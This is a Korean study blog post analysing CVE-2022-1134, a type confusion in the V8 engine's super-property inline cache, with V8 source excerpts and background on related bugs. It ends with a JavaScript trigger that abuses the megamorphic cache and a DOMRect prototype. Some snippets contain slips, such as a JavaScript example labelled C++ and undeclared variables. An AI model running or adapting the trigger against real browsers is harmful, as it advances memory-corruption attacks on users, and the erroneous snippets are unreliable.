CVE-2022-1134 Analysis

mhibio·2022년 7월 7일

며칠전, CVE-2022-1134 의 분석글 “The Chromium super (inline cache) type confusion”이 올라왔습니다.

CVE-2022-1134는 V8 Engine에서 발생하는 Type Confusion 취약점이며, 원문에서는 취약점 뿐만아니라 Inline Caching과 자바스크립트에서의 Super , 비슷한 유형의 과거 취약점들도 설명하고있습니다.

이 글은 어디까지나 개인 소장을 위해서 원문의 일부 번역과 개인적으로 공부한 내용들을 정리해볼 계획입니다.

원문과 다르거나, 잘못 공부한 내용이 있을 수 있기 때문에 감안해주시고, 더 자세한 내용을 원하신다면 본문보다는 원문을 참고하시는걸 추천드리겠습니다.

V8 Engine의 인라인 캐싱(IC)

인라인 캐싱(줄여서 IC)는 V8 Interpreter 에서 바이트코드의 속도를 올리기 위한 최적화기법입니다.

Ignition은 함수를 바이트 코드로 변환하고, 함수가 실행될때 마다 Profiling data와 Feedback 을 수집합니다. Feedback은 JIT 컴파일러에서 사용됩니다.

최적화를 위한 자세한 내용은 “이 문서”를 참고하세요.

인라인 캐싱을 위한 자세한 내용은 “이 문서”를 참고하세요.

V8 Engine의 바이트코드(ByteCode) 핸들링

바이트코드는 D8에서 --print-bytecode옵션을 통해 확인할 수 있습니다.

function f(a) {
  return a.x
}

해당 함수는 다음과 같은 바이트 코드를 생성합니다.

[generated bytecode for function: f (0x11e7001d36cd <SharedFunctionInfo f>)]
...
Bytecode Age: 0
         0x11e7001d3886 @    0 : 2d 03 00 00       GetNamedProperty a0, [0], [0]
         0x11e7001d388a @    4 : a9                Return

생성된 바이트코드들은 다양한 IGNITION_HANDLER에 의해 처리됩니다.

예시로, 위에 코드에서 사용된 GetNamedProperty 바이트코드는 다음 핸들러에 의해 처리됩니다.

IGNITION_HANDLER(GetNamedProperty, InterpreterAssembler) {
  ...
  accessor_asm.LoadIC_BytecodeHandler(&params, &exit_point);

  BIND(&done);
  {
    SetAccumulator(var_result.value());
    Dispatch();
  }
}

IGNITION_HANDLER는 LoadIC_BytecodeHandler로 넘어갑니다

LoadIC_BytecodeHandler 함수는 수집된 Feedback을 검사하고, Property에 접근할 방법을 결정합니다.

함수 최초실행시에는, Property 접근방법은 비교적 느린 런타임구현이 됩니다.

이와 동시에 Feedback이 수집되고, 그에 따라서 오브젝트에 대한 최적화된 Property접근 핸들러가 캐싱됩니다.

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  ...
  GotoIf(IsUndefined(p->vector()), &no_feedback);

  ...
  BIND(&no_feedback);      //<---------- no feedback, falls back to runtime implementation
  {
    Comment("LoadIC_BytecodeHandler_nofeedback");
    // Call into the stub that implements the non-inlined parts of LoadIC.
    exit_point->ReturnCallStub(
        Builtins::CallableFor(isolate(), Builtin::kLoadIC_NoFeedback),
        p->context(), p->receiver(), p->name(),
        SmiConstant(FeedbackSlotKind::kLoadProperty));
  }
  ...

Feedback이 수집되었다면, Bytecode Handler는 현재 Property에 접근하기에 가장 적합하고 최적화된 Property Handler 를 탐색합니다.

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  ...
	// IF Feed -> Inlined fast path.
  {
    Comment("LoadIC_BytecodeHandler_fast");

    TVARIABLE(MaybeObject, var_handler);
    Label try_polymorphic(this), if_handler(this, &var_handler);

    TNode<MaybeObject> feedback = TryMonomorphicCase(           //<-------- Look for cached handler
        p->slot(), CAST(p->vector()), lookup_start_object_map, &if_handler,
        &var_handler, &try_polymorphic);

    BIND(&if_handler);  //<--------- handler found
    HandleLoadICHandlerCase(p, CAST(var_handler.value()), &miss, exit_point);  //<------- try to use optimized handler
    ...
  }
}

Property Handler를 발견하면 사용하고, 찾지 못하거나 특정 조건에 맞지 않다면(Cache miss), 다시 처음으로 Fallback합니다.

Property Handler 의 캐싱 및 사용

이전에 설명한 Cache Missing상황이 발생하면 런타임함수 *IC_Miss() 를 통해 경우를 처리합니다.

원문에서는 LoadIC_Miss()함수가 예로 사용되었지만 본문에서는 다루지 않겠습니다.

대부분의 *Ic_Miss() 는 다음 과정을 수행할것으로 예상됩니다.

*IC Object 생성
새로운 최적화된 핸들러 생성
적절한 경우 인라인 캐싱 동시진행

자바스크립트의 상속

곧 다룰 취약점은 super 의 property를 인라인 캐시에서 처리하는데 발생합니다.

super 이해하기 위해서 상속을 설명합니다.

super키워드는 여러 객체지향언어에도 존재하지만, Java 및 C++과 같은 다른와 JavaScript의 super작동방식에는 차이가존재합니다.

차이점은 원문에는 설명되어있지만 본문에서는 자세하게 설명하지 않겠습니다.

다음의 코드에서 JAVA와 C++등의 super키워드에 따르면 super.foo에는 1이 존재할 것으로 예상하지만 실제로는 undefined이 들어있습니다.

그 이유는, Javascript에서는 필드에 오브젝트가 명시적으로 정의되어있어야 하기 때문입니다.

이게 바로 타 객체지향언어와 자바스크립트의 차이입니다.

class A {
    foo = 1;
}

class B extends A {
    constructor() {
        super();
        super.foo; //<------ undefined
    }
}

JavaScript의 Class는 프로토타입을 통해 정의됩니다.

아래 코드는 Class B가 Class A를 상속한다는것을 보여주는 코드입니다.

C++에서 Class A를 상속하는 코드를 JavaScript에서는 prototype.__proto__ 에 접근하는것으로 유사하게 정의가 가능합니다.

prototype이 무엇인지 모르는 분들은 객체의 origin정도로만 생각하셔도 좋을 것 같습니다.

공부하면서 느낀 신기했던점은 B.prototype.__proto__를 통해 프로토타입의 프로토타입에 접근가능하다는 점이였습니다.

# C++
class A {
  get prop() {
    return this.a;
  }
}

class B extends A {
  constructor() {
    super();
    this.a = 'B';
  }
  m() {
    return super.prop;
  }
}

var b = new B();
b.m();  //<------ 'B'

// Javascript
class B {
  m() {
    return super.prop;
  }
}

B.prototype.__proto__ = {get prop() {return this.x}};

var b = new B();
b.x = 1;
b.m() //<-------- 1

상속과 프로토타입을 어느정도 이해했다면 이제 super키워드를 조금더 자세히 알아볼 차례입니다.

다음 코드는 prototype.__proto__ 를 통해 B Object에 super property 를 정의해줄 수 있다는사실을 알려주빈다.

class B {
  m() {
    return super.prop;
  }
}

B.prototype.__proto__ = {prop : 1};

var b = new B();
b.m() //<-------- 1

TypeError 발생

매우재미있게 자바스크립트에서는 다음과 같은 코드도 작동할 수 있습니다.

물론 b.m()을 만나기 전까지…

class B {
  m() {
    return super.length;
  }
}

var b = new B();
B.prototype.__proto__ = new Int8Array(1);
b.m();  //<---- throw TypeError

Class B 의 Prototype에 Int8Array를 넣어주었습니다.

그리고 난뒤 b.m()을 수행하면 throw TypeError가 발생합니다. 그 이유는 매우 간단합니다.

prototype이 JS_TYPED_ARRAY_TYPE대신 JS_OBJECT_TYPE일것이라고 예상했기 때문입니다.

이제 코드를 살펴봅시다.

SuperIC의 문제

해당 챕터에서는 SuperIC를 설명함과 동시에 다루어졌던 취약점들에 대한 간단한 설명도 되어있습니다.

Super Inline Cache ( SuperIC )는 super property에 접근하기 위해 사용되는 인라인 캐시입니다.

이에 맞는 IGNITION_HANDLER는 다음과 같습니다.

IGNITION_HANDLER(GetNamedPropertyFromSuper, InterpreterAssembler) {
  ...
  TNode<Object> result =
      CallBuiltin(Builtin::kLoadSuperIC, context, receiver,
                  home_object_prototype, name, slot, feedback_vector);
  SetAccumulator(result);
  Dispatch();
}

super property 는 kLoadSuperIC함수에 의해 핸들링됩니다.

해당 함수는 LoadIC함수와 매우 유사하게 작동합니다

한가지 특이점은

**super property는 reciver(this) 오브젝트가 부모 prototype에 의해 결정됩니다.**

이처럼 Parent Prototype이 다른 TYPE을 가질 수 있기 때문에,
Parent Prototype 의 TYPE추론에 대한 검사가 이루어져야하지만, 그렇지 못하였기때문에 취약점이 발생한 경우도 존재합니다. (CVE-2021-30517)

조금더 자세히 설명하자면

이는 super property 은 lookup_start_object 으로 확인할 수 있습니다.

다음코드는 super property 의 map을 가져오는과정입니다.

void AccessorAssembler::LoadSuperIC(const LoadICParameters* p) {
  ...
  TNode<Map> lookup_start_object_map =
      LoadReceiverMap(p->lookup_start_object());
  ...

V8 Engine에서는 현재 호출되어진 객체(this)를 receiver 혹은 home_object 변수로 표시하는데,

다시말해, 과거에는 lookup_start_object 과 receiver 변수를 혼용하여 여러가지 취약점이 발견되었고, CVE-2021-30517이 가장먼저 발견된 취약점입니다.

이 취약점은 call_handler가 cache를 조회할 때 발생합니다.

void AccessorAssembler::HandleLoadICHandlerCase(
    const LazyLoadICParameters* p, TNode<Object> handler, Label* miss,
    ExitPoint* exit_point, ICMode ic_mode, OnNonExistent on_nonexistent,
    ElementSupport support_elements, LoadAccessMode access_mode) {
  ...

  BIND(&call_handler);
  {
    exit_point->ReturnCallStub(LoadWithVectorDescriptor{}, CAST(handler),
                               p->context(), p->receiver(), p->name(),     //<------- receiver used in the call.
                               p->slot(), p->vector());
  }
}

해당 포인터에서 p->receiver() 대신 parent property 인 p->lookup_start_object()가 인수로 들어가야했지만 그렇지 않았기 때문에 type 이 혼용됐습니다.

call_handler 는 string object 및 function object 에만 사용되는 특수한 경우의 핸들러입니다.

다음 코드는 type confusion을 유발할 것입니다.

class C {
        m() {
            super.prototype 
														
        }
 }
 function f() {}
 C.prototype.__proto__ = f  
 // C -> loopup_start_object = function 입니다.
 // 이를 핸들링 하기 위해서 SuperIC는 Call_handler를 function으로 지정할 것입니다.

 let c = new C();
 c.m(); 
 // 하지만 c.m()을 수행하면 함수 m() 안에서 super.prototype - call_handler의 인수로
 // C -> lookup_start_object가 아닌 C -> receiver가 들어갈 것입니다.

하지만 ComputeHandler함수를 자세히 살펴보면, 버그를 trigger하기위해서는 또다른 문제가 있음을 알 수 있습니다.

Handle<Object> LoadIC::ComputeHandler(LookupIterator* lookup) {
  Handle<Object> receiver = lookup->GetReceiver();
  ...
  if (!IsAnyHas() && !lookup->IsElement()) {
    ...
    if (receiver->IsString() && *lookup->name() == roots.length_string()) {
      TRACE_HANDLER_STATS(isolate(), LoadIC_StringLength);
      return BUILTIN_CODE(isolate(), LoadIC_StringLength);
    }
    ...
  }

call_handler가 receiver를 사용하기는 하지만, super.prototype의 call_handler가 생성될때에도 receiver의 타입이 검사됩니다.

super.prototype을 호출하는 함수는 무조건 class안에 정의되어야합니다. 그렇기 때문에 함수의 this(receiver)의 타입도 변경이 불가능합니다.

이를 해결하기 위해선 monomorphic inline cache가 필요합니다.

Megamorphic inline cache

다음과 같은 간단한 경우에는 다른 인라인 캐시를 공유하여 사용하는것이 가능합니다.

이를 메가모픽(Megamorphic) 인라인 캐시라고 합니다.

function f(a) {
  return a.x;
}

이 예시는 f()함수가 호출될 때 마다 a의 map이 동일하다면 인라인 캐시는 monomorphic이 됩니다.

이 상태에서 다른 map을 가진 인자가 들어온다면 인라인캐시는 polymorphic 이 됩니다. ( 다형성 )

하지만 polymorphic IC 가 처리할 수 있는데 map의 개수는 제한이 있고, map이 꾸준히 증가한다면 이 경우 Megamorphic IC가 됩니다.

Megamorphic IC는 다른 함수와 공유되며 예시로A에서 생성된 핸들러는 B에서 사용될 수 있습니다. 이를 설명하는 코드는 아래와 같습니다.

function main() {
  function f() {}
  class A {
    m() {
      return super.prototype;
    }
  };
  A.prototype.__proto__ = f;
  f.prototype;
  let a = new A();
  a.m();
}

main()함수가 실행될 때마다 class A에 대한 map이 여러번 생성될 것이고 (new A()로 할당), 함수 f가 A.prototype.__proto__에 할당될 때마다 f의 새로운 map이 생성될 것입니다.

이러한 접근들은 Megamorphic IC 를 사용하게 될 것입니다. 그렇게 된다면 super.prototype은 f.prototype에 의해 만들어진 call_handler를 사용할 것입니다.

function main() {
  ...
  A.prototype.__proto__ = f;
  f.prototype;    //<------ create handler for map of f in megamorphic cache
  let a = new A();
  a.m();          //<------ calls super.prototype, lookup_start_object is f,
                  //        so the handler created by f.prototype will be used
                  //        but `a` (receiver) will be used by the handler
}

이렇게 하면 call_handler에서 lookup_start_object대신 receiver를 넘겨 type confusion 이 발생할 것입니다.

이에 대한 다른 취약점인 CVE-2021-38001도 존재합니다.

취약점

우리가 다룰 취약점은 다음부분에서 발생합니다.

Handle<Object> LoadIC::ComputeHandler(LookupIterator* lookup) {
    ...
	  Handle<Map> map = lookup_start_object_map();
		...
    case LookupIterator::ACCESSOR: {
        ...
        CallOptimization call_optimization(isolate(), getter);
        if (call_optimization.is_simple_api_call()) {          //<--------- 1.
          CallOptimization::HolderLookup holder_lookup;
          Handle<JSObject> api_holder =
              call_optimization.LookupHolderOfExpectedType(isolate(), map,      //<----- 2.
                                                           &holder_lookup);

          if (!call_optimization.IsCompatibleReceiverMap(api_holder, holder,    //<----- 3.
                                                         holder_lookup) ||
              !holder->HasFastProperties()) {
            TRACE_HANDLER_STATS(isolate(), LoadIC_SlowStub);
            return LoadHandler::LoadSlow(isolate());
          }

          smi_handler = LoadHandler::LoadApiGetter(
              isolate(), holder_lookup == CallOptimization::kHolderIsReceiver);
          ...

getter의 속성이 simple_api_call인지 1번에서, 현재 map이 사용하기에 적합한지 2,3번에서 검사합니다.

simple_api_call함수란 v8 이 임베디드 어플리케이션에서 사용될때 외부 C++ 함수를 사용하도록 하는 방법입니다.

V8 api를 통해 임베더에서 정의된 기능을 V8 에서, V8에서 정의된 기능을 임베더에서 사용할 수 있게 됩니다.

다시 돌아가 1번검사에서 그들은 map 을 사용하기에 적합한지 확인한다고 했습니다.

다만 검사를 하는 map 자체가 잘못들어간 map 인것입니다.

검사되는 map은 lookup_start_object의 map이 될것입니다.

class B {
  m() {
    return super.prop;
  }
}

var b = new B();
var a = {get prop() {return this.x}, x : 'A'};
b.x = 'B';

B.prototype.__proto__ = A;

b.m() //<-------- 'B'

b.x를 바꾸엇을 때 a.x가 바뀐었다는 점은 다시말하지만

super객체애 대한 접근자가 호출될 때, receiver(this) 가 사용되기 때문입니다.

Interactions between V8 and Blink

V8 api중 하나인 DOMRectReadOnly를 사용해서 버그를 트리거 할 것입니다.

DOMRectReadOnly 가 실제 V8과 Blink의 메모리에서 어떻게 사용되는지 알기 위해서는 원문을 참고해주세요.

class B {
    m() {
      return super.x;
    }
  }
  B.prototype.__proto__ = new DOMRectReadOnly(1, 1, 1, 1);
  let b = new B();
  b.m(); //<---- throws TypeError: Illegal invocation

하지만 IC가 구성이 되지 않은상태에서 트리거를 시도한다면 오류가 날것이므로, 생성을 여러번 반복시켜 Megamorphic IC를 활성화하고, call_handler 속여야 합니다.

class B {
  m() {
    return super.x;
  }
}

function main() {
  var domRect = new DOMRect(1, 1, 1, 1);
  domRect['a' + i] = 1;
  if (i < 20 - 1) {
    B.prototype.__proto__ = {};  //<----- sets to `{}` to avoid throw before triggering bug.
  } else {
    B.prototype.__proto__ = domRect;  //<----- triggers the bug after inline cache is created.
  }
  let b = new B();

  b.x0 = 0x40404040;
  b.x1 = 0x41414141;
  b.x2 = 0x42424242;
  b.x3 = 0x43434343;
  domRect.x; //<------ create inline cache
  b.m();     //<------ use inline cache, type confusion on i == 20
}  

for (let i = 0; i < 20; i++) main(i);